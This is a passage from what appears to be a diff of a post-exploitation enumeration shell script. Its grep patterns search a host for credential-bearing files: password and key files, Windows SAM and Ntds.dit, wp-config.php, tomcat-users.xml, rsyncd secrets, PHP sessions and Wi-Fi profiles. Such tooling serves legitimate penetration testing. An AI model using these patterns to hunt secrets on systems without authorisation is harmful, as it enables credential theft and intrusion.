"^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_JETTY=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/lib|^/system|^/snap|^/systemd|^/opt|^/sbin|^/tmp|^/lib32|^/media|^/usr|^/lib64|^$GREPHOMESEARCH|^/.cache|^/cdrom|^/sys|^/applications|^/run|^/mnt|^/var|^/private|^/etc|^/bin|^/srv" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/lib|^/system|^/snap|^/systemd|^/opt|^/sbin|^/tmp|^/lib32|^/media|^/usr|^/lib64|^$GREPHOMESEARCH|^/.cache|^/cdrom|^/sys|^/applications|^/run|^/mnt|^/var|^/private|^/etc|^/bin|^/srv" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/lib|^/system|^/snap|^/systemd|^/opt|^/sbin|^/tmp|^/lib32|^/media|^/usr|^/lib64|^$GREPHOMESEARCH|^/.cache|^/cdrom|^/sys|^/applications|^/run|^/mnt|^/var|^/private|^/etc|^/bin|^/srv" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/mnt|^/var|^/private" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E '/default/settings.php' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/lib|^/private|^/applications|^/etc|^/systemd|^/media|^/bin|^/snap|^/usr|^/mnt|^/var|^/opt|^/sbin|^/.cache|^/srv|^$GREPHOMESEARCH|^/cdrom" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/etc" | grep -E "system-connections$" | sort | uniq | head -n 70) + PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) + PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/etc" | grep -E "exports$" | sort | uniq | head -n 70) + 